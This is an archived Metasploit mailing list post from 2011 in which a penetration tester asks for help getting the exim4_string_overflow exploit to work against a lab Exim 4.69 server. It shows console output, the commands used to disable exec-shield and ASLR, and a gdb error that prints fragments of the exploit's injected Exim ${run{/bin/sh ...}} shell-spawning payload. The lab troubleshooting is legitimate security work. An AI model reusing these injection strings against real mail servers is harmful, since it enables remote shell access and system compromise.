Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

exim4_string_overflow

From: Paul Johnston <paul.johnston () pentest co uk>
Date: Thu, 03 Feb 2011 11:30:03 +0000
Hi,

I'm having real trouble setting up a demo environment to try the
exim4_string_overflow exploit against.

The target OS is Oracle Enterprise Linux 5.4, running on VirtualBox.
I've tried both the bundled Exim RPM and verion 4.69 compiled from
source. I've disabled exec-shield and address randomizatation:

[root@localhost ~]# cat /proc/sys/kernel/exec-shield
0
[root@localhost ~]# cat /proc/sys/kernel/randomize_va_space
0

When I run the exploit, the folowing happens (if I'm *NOT* tracking the
process with gdb):

msf exploit(exim4_string_format) > exploit

[*] Started reverse double handler
[*] Connecting to 192.168.3.4:25 ...
[*] Server: 220 localhost ESMTP Exim 4.69 Wed, 02 Feb 2011 19:17:47 +0000
[*] EHLO: 250-localhost Hello ZtTr2Wp2.com [192.168.3.2]
[*] EHLO: 250-SIZE 52428800
[*] EHLO: 250-PIPELINING
[*] EHLO: 250 HELP
[*] Determined our hostname is ZtTr2Wp2.com and IP address is 192.168.3.2
[*] MAIL: 250 OK
[*] RCPT: 250 Accepted
[*] DATA: 354 Enter message, ending with "." on a line by itself
[*] Constructing initial headers ...
[*] Constructing HeaderX ...
[*] Constructing body ...
[*] Sending 50 megabytes of data...
[*] Ending first message.
[-] Exploit exception: end of file reached
[*] Exploit completed, but no session was created.

If I do track with gdb, the flow is slightly different but the exploit
still fails. gdb shows this:

(gdb) c
Continuing.

(metasploit continues to send 50mb message)

Error while mapping shared library sections:
'exec /bin/sh -i <&7 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&8

&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&9 >&0 2>&0'}}

${run{/bin/sh -c 'exec /bin/sh -i <&10 >&0 2>&0'}} ${run{/bin/sh -c
'exec /bin/sh -i <&11 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&12

&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}

${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}} ${run{/bin/sh -c 'exec
/bin/sh -i <&5 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&6 >&0
2>&0'}} ${run{/bin/sh -c 'exec /b: No such file or directory.
(no debugging symbols found)

Program received signal SIGABRT, Aborted.
0x007d2402 in __kernel_vsyscall ()

Any ideas? I'm totally stuck! Thanks,

Paul

-- 
Pentest - When a tick in the box is not enough

Paul Johnston - IT Security Consultant / Tiger SST
Pentest Limited - ISO 9001 (cert 16055) / ISO 27001 (cert 558982)

Office: +44 (0) 161 233 0100
Mobile: +44 (0) 7817 219 072

Email policy: http://www.pentest.co.uk/legal.shtml#emailpolicy
Registered Number: 4217114 England & Wales
Registered Office: 26a The Downs, Altrincham, Cheshire, WA14 2PU, UK
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: